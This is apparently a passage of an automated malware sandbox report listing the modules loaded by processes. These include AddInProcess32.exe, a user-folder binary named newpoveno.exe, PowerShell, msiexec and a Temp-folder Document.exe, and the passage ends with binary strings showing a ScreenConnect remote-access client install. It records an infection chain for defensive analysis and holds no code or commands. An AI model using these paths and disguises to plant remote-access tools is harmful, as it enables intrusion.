Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: spp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vss_ps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wuapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wups.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: unistore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: libcares-2.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: msvcp290.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: icu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: msasn1.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: libcares-2.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: msvcp290.dll
Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Section loaded: icu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dll
                            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dll
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Document.exe, 00000025.00000002.4296042211.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: ntkrnlmp.pdb source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Document.exe, 00000025.00000002.4296042211.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.PDB source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: winload_prod.pdb' source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.pdb0$4 source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4293631589.0000000005500000.00000004.08000000.00040000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6366331058.000000001BAB2000.00000002.00000001.01000000.00000019.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.PDB source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6333087252.0000000001E72000.00000002.00000001.01000000.00000018.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6329378162.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6327680600.0000000002CD0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4235339870.0000000002E90000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000000.4266258398.000000000081D000.00000002.00000001.01000000.00000017.sdmp
                            Source: Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp
